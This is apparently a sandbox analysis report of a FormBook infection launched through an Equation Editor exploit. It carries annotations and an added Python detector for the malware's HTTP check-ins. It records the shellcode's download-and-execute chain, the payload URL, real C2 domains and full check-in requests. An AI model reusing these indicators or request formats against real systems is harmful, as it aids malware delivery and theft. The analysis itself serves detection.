Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D0552 ExitProcess, 2_2_036D0552
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D04AE URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D04AE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D0424 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D0424
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D0408 URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D0408
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D0518 ShellExecuteW,ExitProcess, 2_2_036D0518
Source: global traffic | DNS query: name: www.arjimni.com
Source: global traffic | TCP traffic: 192.168.2.22:49173 -> 104.168.33.31:80 (reported twice)
The 2_2_036D04xx functions sit at 0x036D0000 in pid 2 (EQNEDT32.EXE), well away from the Equation Editor image, consistent with the "Shellcode detected" signature: this is the exploit payload, and its API chain (LoadLibraryW to resolve urlmon, URLDownloadToFileW to fetch http://104.168.33.31/75/vbc.exe into the Internet Explorer cache, ShellExecuteW to launch it, ExitProcess to close the Equation Editor) accounts for the network connection, the dropped file and the child process recorded above.

          Networking

Source: C:\Windows\explorer.exe | Network Connect: 23.81.214.26 80
Source: C:\Windows\explorer.exe | Domain query: www.arjimni.com
Source: C:\Windows\explorer.exe | Domain query: www.tw-life.net
Source: C:\Windows\explorer.exe | Domain query: www.contractornurd.com
Source: C:\Windows\explorer.exe | Domain query: www.yiwanggkm.com
Source: C:\Windows\explorer.exe | Network Connect: 164.155.217.57 80
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Malware configuration extractor | URLs: www.arjimni.com/nc39/
Source: Joe Sandbox View | ASN Name: LEASEWEB-USA-SEA-10US
Source: global traffic | HTTP traffic detected:
  GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1
  Host: www.arjimni.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected:
  GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1
  Host: www.contractornurd.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected:
  GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1
  Host: www.tw-life.net
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic | HTTP traffic detected:
  GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1
  Host: www.yiwanggkm.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: Joe Sandbox View | IP Address: 198.54.117.212
The check-ins are issued by explorer.exe, not by any of the dropped binaries: yldnat.exe injects into explorer.exe (see the process tree and the "System process connects to network (likely due to code injection or exploit)" signature), so host controls keyed on the payload's file name do not see this traffic. Of the four hosts queried, only www.arjimni.com appears in the configuration's C2 list; www.tw-life.net, www.contractornurd.com and www.yiwanggkm.com are configured decoys that receive structurally identical requests so the real beacon does not stand out.
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:19:31 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Fri, 13 May 2022 09:36:08 GMTETag: "4065c-5dee1677234a5"Accept-Ranges: bytesContent-Length: 263772Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 
00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic | HTTP traffic detected:
  GET /75/vbc.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 104.168.33.31
  Connection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_036D04FF
This is the stage-two download made by the shellcode's URLDownloadToFileW call; the Internet Explorer user agent is the one urlmon supplies for that API, which is why the download carries a browser user agent while the FormBook check-ins above carry none.
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 13:20:49 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 13:21:05 GMTContent-Type: text/htmlContent-Length: 466Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a 
href="/"></a></body></html>
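The four check-in requests quoted above share a shape that does not depend on the domain: a two-level path of a few alphanumerics, two query parameters (a base64 blob and a short identifier), Connection: close, no User-Agent, and seven 0x00 bytes sent after the header block of a GET. The following added example (not part of the report and not a Joe Security or Emerging Threats signature) scores raw HTTP requests on those traits. The first two requests are reconstructed from the report's GET lines, the third is the stage-two download from the report, and the fourth is a constructed ordinary browser request; the individual checks and the alert threshold are this example's own choices.

```python
"""Heuristic detector for FormBook-style HTTP check-ins.

Added example; not part of the Joe Sandbox report and not a Joe Security or
Emerging Threats signature. CHECKIN_* are reconstructed from the GET requests
in the report, STAGE2_DOWNLOAD from the vbc.exe download, and BENIGN_BROWSER
is a constructed control. Checks and threshold are this example's assumptions.
"""
import re

CHECKIN_ARJIMNI = (
    b"GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1\r\n"
    b"Host: www.arjimni.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)
CHECKIN_DECOY = (
    b"GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1\r\n"
    b"Host: www.contractornurd.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"\x00\x00\x00\x00\x00\x00\x00"
)
STAGE2_DOWNLOAD = (
    b"GET /75/vbc.exe HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0)\r\n"
    b"Host: 104.168.33.31\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)
BENIGN_BROWSER = (
    b"GET /index.html?lang=en HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

ALERT_THRESHOLD = 4  # assumption: four of the five traits below


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query params, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = [(k, v) for k, _, v in (p.partition("=") for p in query.split("&") if p)]
    return {"method": method, "path": path, "params": params,
            "headers": headers, "body": body}


def score_request(raw: bytes) -> dict:
    """Count FormBook check-in traits; alert when enough of them co-occur."""
    req = parse_request(raw)
    hits = []
    # Observed: a short directory-style path such as /nc39/ and nothing else.
    if re.fullmatch(r"/[A-Za-z0-9]{2,6}/", req["path"]):
        hits.append("short-directory-path")
    # Observed: exactly two parameters, a base64 blob then a short alphanumeric id.
    p = req["params"]
    if (len(p) == 2
            and re.fullmatch(r"[A-Za-z0-9+/]{32,}={0,2}", p[0][1])
            and re.fullmatch(r"[A-Za-z0-9]{6,10}", p[1][1])):
        hits.append("base64-blob-plus-short-id")
    # Observed: no User-Agent at all (browsers and urlmon always send one).
    if "user-agent" not in req["headers"]:
        hits.append("no-user-agent")
    if req["headers"].get("connection", "").lower() == "close":
        hits.append("connection-close")
    # Observed: a GET followed by a body consisting only of NUL bytes.
    if req["method"] == "GET" and req["body"] and set(req["body"]) == {0}:
        hits.append("nul-bytes-after-get")
    return {"host": req["headers"].get("host", ""), "score": len(hits),
            "hits": hits, "alert": len(hits) >= ALERT_THRESHOLD}


if __name__ == "__main__":
    for sample in (CHECKIN_ARJIMNI, CHECKIN_DECOY, STAGE2_DOWNLOAD, BENIGN_BROWSER):
        r = score_request(sample)
        print(f"{r['host']:24s} score={r['score']} alert={r['alert']} {r['hits']}")
```

Because the traits are structural, the decoy check-in to www.contractornurd.com scores the same as the real one to www.arjimni.com: the detection does not depend on knowing the C2 domain in advance, which matters for a family that rotates C2s per build. The stage-two download and the browser request score zero, so the download has to be caught by other means (the EQNEDT32 network rule, or the executable content type in the response).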
          Source: unknownTCP traffic detected without corresponding DNS query: 104.168.33.31
          Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comI equals www.linkedin.com (Linkedin)
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
          Source: EQNEDT32.EXE, 00000002.00000003.965529883.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.971155692.0000000000614000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.33.31/75/vbc.exe
          Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.33.31/75/vbc.exehhC:
          Source: EQNEDT32.EXE, 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://104.168.33.31/75/vbc.exej
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: vbc.exe, 00000004.00000000.968426551.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000007.00000000.1008792318.0000000006450000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.1022782803.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.1011703149.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000245149.0000000008611000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 00000007.00000000.1022834782.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77AC4BD4.emf
          Source: unknown | DNS traffic detected: queries for: www.arjimni.com
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_036D04FF
          Source: global traffic | HTTP traffic detected: GET /75/vbc.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 104.168.33.31 | Connection: Keep-Alive
